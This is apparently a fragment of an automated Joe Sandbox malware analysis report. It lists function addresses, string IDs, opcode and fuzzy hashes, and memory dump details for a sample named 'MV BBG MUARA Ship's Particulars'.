                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                                                  • API String ID: 0-3929485403
                                                                                                                  • Opcode ID: ea58fb0797cbf5b6d79aff78e602c6068968c343ab1772000ceab0a62497a338
                                                                                                                  • Instruction ID: 7dc51a4fa665c3a7c5b75867a36f6d5fd7189bbbb953cf648173c7233a922640
                                                                                                                  • Opcode Fuzzy Hash: ea58fb0797cbf5b6d79aff78e602c6068968c343ab1772000ceab0a62497a338
                                                                                                                  • Instruction Fuzzy Hash: A5916D70A1120D9FEB64DF64DA947AE7BBAAF84310F308529D401AF794DB749D41CB90
                                                                                                                  Function 069170A0 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: .5~q$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                                                  • API String ID: 0-1301248726
                                                                                                                  • Opcode ID: 6ec7bf4396e3f4082458840824650767ce52301a10fc693947a278c310fd6b5d
                                                                                                                  • Instruction ID: c317c960f0c61f33c6d949702374a11e20f28189ea6deea7ad69d53092623c17
                                                                                                                  • Opcode Fuzzy Hash: 6ec7bf4396e3f4082458840824650767ce52301a10fc693947a278c310fd6b5d
                                                                                                                  • Instruction Fuzzy Hash: F3F15F34B0020ACFDB55EFA8D594A6EB7B7BF88340F248528D4159F759CB70AC82CB81
                                                                                                                  Function 069183D8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $fq$$fq$$fq$$fq
                                                                                                                  • API String ID: 0-2113499236
                                                                                                                  • Opcode ID: e17fcf6e352c6efb86717673c5ee3f2d57ff31e897b7c6da977159af9e16e2a8
                                                                                                                  • Instruction ID: d6c656c616cd41a2d22541921a2ec62087c19129a9be307a2380786938202779
                                                                                                                  • Opcode Fuzzy Hash: e17fcf6e352c6efb86717673c5ee3f2d57ff31e897b7c6da977159af9e16e2a8
                                                                                                                  • Instruction Fuzzy Hash: 21B14B70F102098FDB94EFA8CA946AEB7B6EF84300F348529D4059B795DB74DC82DB80
                                                                                                                  Function 0691ACD0 Relevance: 5.2, Strings: 4, Instructions: 177COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $fq$$fq$$fq$$fq
                                                                                                                  • API String ID: 0-2113499236
                                                                                                                  • Opcode ID: f5785038c39161450b43e6ba4fb69e9eb73976981d4079faaf700cdbe1a31ce5
                                                                                                                  • Instruction ID: d19fc634d31ea1fbc639b0723e56a783d911ab1ab3d7f70d244fbf06c50fe722
                                                                                                                  • Opcode Fuzzy Hash: f5785038c39161450b43e6ba4fb69e9eb73976981d4079faaf700cdbe1a31ce5
                                                                                                                  • Instruction Fuzzy Hash: 0551BD34B122098FDF65DB64D9846AEB7B6EB84301F30892AE806DF755DB309D41CB91
                                                                                                                  Function 069187F0 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: LRfq$LRfq$$fq$$fq
                                                                                                                  • API String ID: 0-1810675050
                                                                                                                  • Opcode ID: ecf54daab438fc928f0b12459eb4d247bbc60c20c684f72cf957f90296726f0f
                                                                                                                  • Instruction ID: 752305b6b2b8c0e9901c1660ba200bdedc4779af95aa1554d32d89c8a0565bd1
                                                                                                                  • Opcode Fuzzy Hash: ecf54daab438fc928f0b12459eb4d247bbc60c20c684f72cf957f90296726f0f
                                                                                                                  • Instruction Fuzzy Hash: B351C230B002059FDB58EF68CA90A6A77FAFF88314F248968E4159F395DB70EC41DB91